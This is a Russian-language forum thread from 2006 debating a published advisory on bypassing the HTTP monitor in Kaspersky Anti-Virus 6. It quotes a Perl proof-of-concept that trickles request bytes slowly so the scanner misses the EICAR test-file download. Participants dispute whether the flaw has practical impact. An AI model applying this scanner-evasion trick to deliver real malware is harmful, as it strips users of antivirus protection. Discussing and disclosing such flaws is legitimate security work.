Kaspersky antivirus 6: HTTP monitor bypassing

[nobody@nowhere 0]

http://www.securityfocus.com/archive/1/434827 :

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

[Сергей Ильин 1538]

Блин, не успели зарелизить, уже уязвимость нашли ...

[Dmitry Perets 30]

Блин, не успели зарелизить, уже уязвимость нашли ...

Интересно посмотреть, насколько быстро запатчат... Надеюсь, что запатчат.

[broker 30]

john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ

[nobody@nowhere 0]

john

Сергей Ильин

вспоминаем, о чём это говорит???

О ВЫСОКОЙ ПОПУЛЯРНОСТИ

Linux популярнее © ROC FAQ

[broker 30]

ну можно вспомнить певицу Мадонну, она то точно популярнее и известнее Линукса..

А можно блендер с мотоциклом сравнивать..и там и там мотор есть.

Добавлено спустя 7 минут 54 секунды:

вдруг кто не сходит ссылке не почитает..

BugTraq

Back to list | Post reply

Kaspersky antivirus 6: HTTP monitor bypassing May 22 2006 08:09PM

john kak-sam to

Kaspersky antivirus 6

Kaspersky internet security 6

www.kaspersky.com

Vulnerable Systems: KAV6, KIS6

Detail:

The vulnerability is caused due to HTTP parsing errors in the HTTP monitor (Kaspersky Web-antivirus).

Any mailicious software on local computer can bypass HTTP virus monitor.

Solution:

There is no known solution.

Exploit code:

This perl script could be run with ActiveState Perl 5.8:

use IO::Socket::INET;

use strict;

my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',

'http://www.eicar.com/download/eicar.com' );

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)n";

my $s = IO::Socket::INET->new( PeerAddr => $h_srv,

PeerPort => $h_port,

Proto => 'tcp' );

die "socket: $!" unless $s;

sendthem( $s,

"GET $h_url HTTP/1.1",

"Host: $h_srv",

""

);

my $doc = read_body( $s, read_headers( $s ) );

syswrite STDOUT,

'document is <'.$doc.'> len='.length($doc)."n";

sub sendthem {

my $s = shift;

my $c = 0;

foreach( @_ ) {

my @a = split //, $_;

++$c;

syswrite STDOUT, "query $c: ";

foreach( @a ) {

sendone( $s, $_ );

}

sendone( $s, "r" );

sendone( $s, "n" );

}

}

sub sendone {

my( $s, $v ) = @_;

$s->syswrite( $v );

syswrite STDOUT, $v;

# !!! comment next line to have monitoring working

select( undef, undef, undef, 0.300 );

}

sub read_headers {

my( $s ) = @_;

my( $c, $cl ) = ( 0, 0 );

for( ;; ) {

my $l = read_line( $s );

++$c;

syswrite STDOUT, "header $c: $l";

syswrite STDOUT, "rn";

last if not $l and $c;

$cl = $1 if $l =~ /^Content-Length:s+(d+)/;

}

$cl;

}

sub read_line {

my( $s ) = @_;

my $str = '';

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

die 'EOF reading headers!' unless $r;

last if $v eq "n";

next if $v eq "r";

$str .= $v;

}

return $str;

}

sub read_body {

my( $s, $cl ) = @_;

my( $str, $cli ) = ( '', $cl );

syswrite STDOUT, "reading body <content-length: $cli> ...n";

for( ;; ) {

my $v = '';

my $r = $s->sysread( $v, 1 );

last unless $r;

$str .= $v;

--$cl if $cli;

last if not $cl and $cli;

}

return $str;

}

Добавлено спустя 1 минуту 18 секунд:

Кстати, это ещё не уязвимость и даже не кандидат в уязвимости.. Просто сообщение некого

john kak-sam to

[TiX 0]

Этот некто создал этот топик Ж) Война прожолжается...

[broker 30]

чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

[nobody@nowhere 0]

чего-то я не совсем понял смысл..

файл прошедший проверку Веб-Антивирусом, Файловым Антивирусом и Проактивной защитой не проверяется?

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

[broker 30]

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

ну и тест, теста (vir2.gif)

пусть все остальные мониторы выключены (vir3.gif)

А вот с ssl не так всё просто

[nobody@nowhere 0]

HTTP monitor не имеет понятия о HTTP и не проверяет скаченное вообще. говоря коротко - нет никакого Веб-антивируса кроме как в рекламных агитках.

ну допустим, зачем надо было городить огороды.. Для секурити фокус достаточно одной фразы.

чтобы немного прояснить ситуацию был проведён маленький тест, линк с вирусом в закрытой ветке (vir.gif)

тест чего и на что?

[Dmitry Perets 30]

Ответ разработчика ЛК читайте здесь: http://forum.kaspersky.com/index.php?showt...st&p=120245.

А вот с ssl не так всё просто

Проверка ссл-трафика веб-антивирусом появится в MP1 (уже добавлена в бетах).

[broker 30]

тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

[nobody@nowhere 0]

тест чего и на что?

тест формальной работоспособности веб-антивируса.

Работоспособность фиксировалась по выпадающему окну с напдписью ВЕБ-Антивирус

а. осталось троянописателей убедить запускать IE для качанья, они люди злобные и подстраиваться так что бы KAV им не давал качать не будут. было бы не смешно, а просто печально если бы под IE оно тоже пропускало вирусы.

Добавлено спустя 6 минут 48 секунд:

Блин, не успели зарелизить, уже уязвимость нашли ...

читайте интерью Данилова - "поделия ученика 11 класса", ну и все отсюда вытекающее.

[broker 30]

дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

[Сергей Ильин 1538]

На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза

[nobody@nowhere 0]

дайте линк, может что-то проясниться.

Тут фишка вот в чём, работа данного Антивируса инвариантна к браузеру.. по одной простой причине, запрос и ответ проходят через монитор.

Вот пример с оперой

линк на что?

проходят. но монитор их не видит.

[broker 30]

Сергей Ильин

дыра ли это..и вообще.. подождём что напишут на www.securityfocus.com

Господин утверждает, что веб-антивирус в принципе не работает.

линк на что?

интерью Данилова - "поделия ученика 11 класса

[nobody@nowhere 0]

На самом деле, эта дыра в КАВ и КИС не критична, ведь файл передающийся через HTTP, будет все равно проверен монитором на винте, разве нет?

нет. дырки в IE эксплуатируются в полный рост. в iframe, рендеринг картинок - впомните как специальные bmp роняли всю винду. да и просто вредоносный javascript. браузер ничего из этого на диск записывать не будет, он мило отработает. даже если запись в кэш будет остановлена - поздно уже.

Т.е. проверка HTTP трафика на лету это вообще мера избыточная по сути. Но все равно не приятно, что баг нашли сразу после релиза

каков уровень авторов и их знания технологии таков и результат

[broker 30]

javascript

с файловой системой напрямую не работает.

Добавлено спустя 8 минут 38 секунд:

есть одно замечаение, www.securityfocus.com принадлежит конкуренту каспера - семантику. Мне кажется, если, указанная выше, уязвимость была очень серьёзной, то семантик бы первый крикнул.. типа ВОТ ВАМ..

хотя с другой стороны, кто его знает.. что там в голове у семантика )))

[Dmitry Perets 30]

Я запустил зловещий скрипт, долго смотрел на приведённый ниже алерт, задавая себе вопрос "А где прикол?"... И потом до меня вдруг дошло! Ну конечно же! john, я наконец-то всё понял! Ведь это же алерт Анти-Хакера! То есть фаервола! То есть такой штуки, которой в Dr.Web, как бы это сказать, нету... Именно поэтому вы не учли, что такой алерт появится, если вы вместо стандартного браузера или даунлоадера (для защиты которых создан компонент Web-Antivirus в КИС 6) используете ваш самописный скрипт, запущенный на компе клиента. Что ж, не страшно, с кем не бывает...

Вот на всякий случай, может понадобится кому...=) http://exler.ru/expromt/12-01-2005.htm

[Сергей Ильин 1538]

Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

[Dmitry Perets 30]

дайте линк, может что-то проясниться.

Прояснится только то, что в моём длинном посте про Dr.Web больше правды, чем кажется на первый взгляд =) Держите линк: http://inesp.ru/download/Interview.rar

[broker 30]

Сергей Ильин

это извращённый реверсивный троян. Как я уже не раз писал, в скрипте нет особой уязвимости и тем более угрозы.

ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

НЕЛЬЗЯ.

[Dmitry Perets 30]

Dmitry Perets, ну т.е. получается что в КИС, где есть антихакер, эту уязвимость нельзя будет использовать?

Угу, я вам больше скажу. Я подозреваю, что и в КАВ без антихакера эту уязвимость нельзя будет использовать, ибо сработает файловый монитор, когда eicar будет закачан на комп. Давайте так... Чтобы не быть голословным, я вечером это проверю и выложу скриншоты (в том числе и на форуме ЛК, чтобы народ зря не пугался). Просто в универе я это проверить не могу, так как даже если я жму "Разрешить" в антихакере, eicar блокируется внешним фаерволлом универа =(

Ну а пока я проверяю, пусть нам john кинет линк на инет-магазин, где можно купить веб-антивирус производства Dr.Web, который конечно же будет нас защищать от этого зловреда...=)))))) Ведь раз 11-классники уже написали свой Веб-АВ, то у НАСТОЯЩИХ СПЕЦИАЛИСТОВ непременно найдётся гораздо более надёжная защита, правда?